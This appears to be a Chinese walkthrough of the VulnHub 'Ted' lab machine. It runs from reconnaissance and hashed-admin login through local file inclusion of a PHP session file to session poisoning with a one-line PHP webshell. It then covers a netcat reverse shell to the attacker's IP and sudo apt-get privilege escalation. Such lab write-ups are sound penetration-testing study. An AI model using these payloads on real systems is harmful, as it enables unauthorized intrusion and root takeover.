当前位置: 首页 > news >正文

Ted靶机

信息收集:

靶机地址:https://www.vulnhub.com/entry/ted-1,327/

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:FF:7F:9A'

(2)端口扫描

nmap -p- -A 192.168.254.159

(3)目录扫描,没啥发现

dirb http://192.168.254.159

(4)访问页面

(5)进行弱口令登陆,登陆失败,burp抓包进行测试,发现需要使用hash加密

(6)将admin进行加密试试

加密后的值(转换大小写后)为:8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

(7)再次登录,登陆成功

admin
8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918

(8)发现在搜索框处存在任意文件读取漏洞

../../../../../../../etc/passwd

(9)尝试包含用来存储用户session的文件,从而获取shell,抓取一个有session的请求包,拿到session。点击cookies的时候抓包

(10)拼接如下路径search读取:

将刚才的phpsessid值复制到sess后面
/var/lib/php/sessions/sess_9h9at5lo8mj7ujjsfn2v4qcrd4

(11)抓包将数据包放到重放模块里进行测试,发现可以修改user_pref变量的值,从而写入到session文件中,再结合文件包含漏洞,造成RCE的漏洞

getshell:

(1)写入URL编码后的一句话木马,并在搜索框处输入命令看看是否被执行,发现成功执行

%3C%3Fphp%20system(%24_POST%5B%22cmd%22%5D)%3B%20%3F%3E

(2)写入反弹shell语句

nc+192.168.254.129+4444+-e+/bin/bash

(3)反弹成功

(4)获取一个交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权:

(1)sudo -l

(2)在辅助网站搜索命令

https://gtfobins.github.io/sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

(3)提权成功

http://www.lryc.cn/news/424100.html

相关文章:

  • HarmonyOS ArkTS 构建布局
  • yolov5详解(二):通过yaml文件构建完整模型
  • 8月8日学习笔记 python基础
  • 电动自行车出海黑马Avento独立站拆解(上)丨出海笔记
  • Gerrit 使用教程
  • sudu提权命令账号安全控制(su命令)执行单个命令并返回原用户、执行多个命令并返回原用户、保持当前环境变量、配置文件/etc/sudoers
  • 【线性代数】【二】2.7 矩阵的秩
  • 计算机网络部分基础知识
  • WESWOO合作的出海企业(一)
  • vue 项目中 使用vxe-grid 表格中给表格的表头设置特殊的格式 , 并且给指定的列文字设置颜色
  • 基于SpringBoot的企业资产管理系统
  • ps快捷键,学习
  • python代码模拟服务器实验2:IO多路复用select
  • 修改ubuntu的终端显示语言为英文,界面保持为中文
  • 重塑园区生态,引领产业智慧化新飞跃
  • WSL 忘记ubuntu的密码
  • github项目-创建一个新分支
  • Java设计模式中介者模式的优势与局限性分析
  • 一、软件工程概述
  • 第六天:java设计模式、GUI编程与面向对象设计原则
  • 解读RPA自动化流程机器人
  • Redis17-服务端优化
  • Web语义化及实际应用
  • Linux系统调试课:CPUFreq 中央处理器频率调节技术
  • C++之模版初阶
  • 飞桨paddle API函数scatter详解
  • RCE漏洞复现
  • Qt QTabWidget之创建标签页的多页面切换
  • 【RISC-V设计-14】- RISC-V处理器设计K0A之打印输出
  • 时序预测|基于变分模态分解-时域卷积-双向长短期记忆-注意力机制多变量时间序列预测VMD-TCN-BiLSTM-Attention